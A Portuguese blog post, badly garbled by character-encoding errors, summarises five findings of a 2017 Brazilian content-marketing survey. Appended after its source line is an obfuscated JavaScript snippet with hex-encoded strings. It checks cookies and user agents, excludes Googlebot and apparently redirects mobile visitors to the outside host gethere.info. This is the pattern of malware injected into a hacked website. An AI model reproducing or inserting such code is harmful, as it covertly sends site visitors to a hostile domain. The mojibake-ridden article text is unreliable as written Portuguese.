5 dados relevantes sobre Marketing de ConteA?do no Brasil em 2017


O que esperar doAi??Marketing de ConteA?doAi??em 2017? E como as empresas brasileiras tA?m utilizado a metodologia?

Para responder a questAi??es como essas, aAi??Rock ContentAi??lanAi??ou a terceira ediAi??A?o da pesquisaAi??Content Trends, que contAi??m informaAi??Ai??es para empresas que desejem alcanAi??ar sucesso com o Marketing de ConteA?do.

Realizada por meio de um questionA?rio online entre os dias 2 e 16 de maio de 2017, o questionA?rio contou com a participaAi??A?o de 3650 respondentes de todo o paAi??s. O formulA?rio foi enviado para 80.000 pessoas e promovido nas redes sociais da empresa.

A primeira ediAi??A?o da Content Trends, em 2015, ajudou a conhecer mais sobre as estratAi??gias de Marketing de ConteA?do ai??i?? na Ai??poca, os estudos sobre o mercado ainda eram pouco explorados no Brasil.Ai??JA? na segunda ediAi??A?o, o foco era entender as tendA?ncias dessa prA?tica no paAi??s e como a sua adoAi??A?o evoluiu ao longo dos anos.

Nesta terceira ediAi??A?o, a pesquisa retoma alguns resultados jA? conhecidos nas versAi??es anteriores, e explora mais a fundo algumas informaAi??Ai??es para oferecer um estudo mais completo.

O segmento de agA?ncias de marketing/publicidade foi o que apresentou maior taxa de participaAi??A?o dos respondentes da pesquisa (31,2%). NegA?cios na A?rea de educaAi??A?o e software/cloud/SaaS tambAi??m representaram uma presenAi??a significativa no estudo, com 10,3% e 8,9%, respectivamente.

O site Resultados Digitais separou 5 tendA?ncias apontadas pela pesquisa, que pode serAi??baixada na Ai??ntegra neste link.

 

52,7% das empresas entrevistadas nA?o tA?m um bom conhecimento do funil de vendas

Durante a pesquisa, os participantes que trabalham em empresas que aderem ao Marketing de ConteA?do responderam qual o conhecimento tA?m doAi??funil de vendas. As respostas deveriam ser dadas de acordo com uma escala de 1 Ai?? 5, na qual as notas 4 e 5 representam conhecimento bom e muito bom, respectivamente.

Cerca de 47,3% dos respondentes afirmaram conhecer bem ou muito bem o funil de vendas de suas empresas ai??i?? destas, posts nas redes sociais (85,3%) e em blogs (65,6%) sA?o as tA?ticas mais utilizadas em uma estratAi??gia de Marketing de ConteA?do.

A definiAi??A?o e entendimento do funil de vendas Ai?? essencial para que vocA? possa determinar a saA?de da sua mA?quina de aquisiAi??A?o de clientes e, dessa forma, traAi??ar estratAi??gias que levem ao atingimento das metas.

O prA?prio processo de criaAi??A?o ou revisA?o do funil jA? deve gerar um maior entendimento sobre aAi??jornada de compraAi??do cliente e quais sA?o aAi??Ai??es que a sua empresa poderia realizar para otimizar as vendas.

Sem ter um funil claro, Ai?? comum as empresas investirem em aAi??Ai??es que nA?o resultam no desempenho esperado, mas, em casos extremos, atAi?? na falA?ncia pela incapacidade de trazer novas receitas.

 

 

Empresas que produzem mais de 13 conteA?dos mensais conquistam 4,2 vezes mais visitantes

De acordo com a pesquisa, empresas que produzem mais de 13 conteA?dos por mA?s conquistam atAi?? 4,2 vezes mais visitas do que as publicam atAi?? 12 conteA?dos: a mAi??dia de visitas por volume mensal de publicaAi??A?o Ai?? de 29.670 para quem produz menos e de 125.442 para quem produz mais.

A questA?o de quanto conteA?do produzir Ai?? frequente, em especial entre os que estA?o comeAi??ando a investir na metodologia. Nem em todos os casos Ai?? necessA?ria uma grande quantidade de publicaAi??Ai??es: Ai?? importante pensar sempre no seu pA?blico-alvo e nA?o deixA?-lo sem conteA?do e manter a frequA?ncia definida, ainda que seja uma vez a cada 15 dias.

Da mesma forma, nA?o adianta publicar muitos posts e lanAi??ar diversos materiais por semana se eles nA?o entregam valor para seu visitante. Mas, se vocA? jA? produz conteA?dos de qualidade, aumentar o volume pode ser interessante paraAi??melhorar o trA?fego orgA?nicoAi??e maximizar seu posicionamento nos buscadores.

 

PresenAi??a nas redes sociais: 97,3% das empresas estA?o no Facebook

A pesquisa se interessou em saber tambAi??m como estava a presenAi??a das empresas que adotam uma estratAi??gia de conteA?do nas redes sociais. Segundo os respondentes, 97,3% estA?o presentes noAi??Facebook. Em seguida aparecem oAi??InstagramAi??com 71,1%,Ai??LinkedInAi??com 50,6% e oAi??YouTubeAi??com 44,5%.

Quando comparamos a presenAi??a das empresas nas redes sociais com as ediAi??Ai??es anteriores da pesquisa, o destaque no crescimento fica por conta do Instagram: dentre os negA?cios presentes na rede social, houve um aumento de 29,1% em relaAi??A?o ao ano de 2015; em comparaAi??A?o com 2016, sA?o 23,2%.

Ai?? possAi??vel notar que em redes como Facebook, Instagram, Linkedin, Youtube e Twitter tambAi??m houve crescimento. Dentre as redes sociais participantes da pesquisa, Facebook e Instagram sA?o apontadas tambAi??m como as mais eficazes para fazer Marketing de ConteA?do.

 

 

53,1% das empresas ainda nA?o mensuram o ROI

OAi??Retorno sobre InvestimentoAi??(ROI) em relaAi??A?o ao Marketing de ConteA?do Ai?? uma mAi??trica muito importante e que diz muito sobre o sucesso da estratAi??gia. PorAi??m, cerca de 53,1% nA?o mensuram esse valor, e ainda 20,6% nA?o sabem se Ai?? algo calculado na empresa que trabalham. Os participantes que conheciam o valor do ROI (26,3%) tambAi??m foram questionados se sabiam qual era o na empresa em que trabalham. A mediana das respostas foi de 30%.

ROI (retorno sobre o investimento ou, em inglA?s, return over investment) Ai?? um indicador que permite saber quanto dinheiro a empresa perdeu ou ganhou com os investimentos feitos ai??i?? pode ser emAi??mAi??dia paga, novas ferramentas, treinamentos e por aAi?? vai.

Dessa forma, vocA? pode saber quais investimentos valem a pena e como otimizar aqueles que jA? estA?o funcionando para que performem ainda melhor.

A mAi??trica Ai?? importante porque permite que vocA? avalie como certas iniciativas contribuem com os resultados da empresa. Da mesma forma, com base no ROI Ai?? possAi??vel planejar metas baseadas em resultados tangAi??veis e entender se estA? valendo a pena ou nA?o investir em determinados canais.

 

76,1% das empresas tA?m dificuldade em produzir conteA?dos engajadores

O principal desafio para 2017 em relaAi??A?o ao Marketing de ConteA?do Ai?? produzir conteA?do que engaja o pA?blico, segundo 76,1% dos respondentes. Em seguida, estA?o diversificar conteA?dos e formatos (48,9%) e produzir conteA?do com consistA?ncia (42,1%).

Na maior parte das vezes, a falta de engajamento acontece porque aAi??produAi??A?o de conteA?doAi??estA? longe do ideal: falta planejamento, estratAi??gia e o conteA?do produzido nA?o estA? de fato gerando valor para a audiA?ncia. E isso se traduz em conteA?do que passa despercebido pelo pA?blico, sem ser compartilhado.

Felizmente adotar algumas boas prA?ticas na produAi??A?o de conteA?do ai??i?? como fazer conteA?dos informativos, resolver as dores da suaAi??personaAi??e pA?blico-alvo e utilizar linguagem simples ai??i?? pode ajudar e muito a fazer com que seus materiais se tornem mais atraentes de serem consumidos e compartilhados.

 

Fonte:Ai??Resultados Digitaisvar _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera 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